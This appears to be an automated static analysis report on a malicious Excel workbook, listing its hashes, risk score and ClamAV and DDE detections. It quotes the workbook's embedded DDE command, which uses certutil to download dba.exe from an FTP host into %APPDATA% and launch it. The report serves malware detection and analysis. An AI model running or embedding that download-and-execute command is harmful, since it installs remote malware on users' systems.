Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5f2facc59b3d9eb5…

MALICIOUS

Office (OOXML)

Size: 38.5 KB
Created: 2020-12-24 11:15:18 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2020-12-28

MD5: 7bed66d47f2a956814fec54c24130fea
SHA-1: 4259e8f40cd6598f81040a26eaeb936fac0fb484
SHA-256: 5f2facc59b3d9eb556f9d94eaf62c54d1e0396d571187ed62be3cdff1d6dcfe7

Risk Score: 120

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The critical heuristic 'OOXML_SPREADSHEET_DDE_MALICIOUS' indicates that the Excel file contains a DDE link which executes 'cmd /c certutil -urlcache -split -f ftp://qazwsx@the embedded link/dba.exe %APPDATA%\dba.exe & start %APPDATA%\dba.exe'. This command uses certutil to download 'dba.exe' from the specified FTP URL into %APPDATA% and then launches it. The ClamAV detection further confirms the malicious nature of the file.

Heuristics (2)

  • ClamAV: Xml.Exploit.DDE_Abuse-9987933-1 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xml.Exploit.DDE_Abuse-9987933-1
  • Spreadsheet DDE link launches a dangerous command (severity: critical, id: OOXML_SPREADSHEET_DDE_MALICIOUS)
    The Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.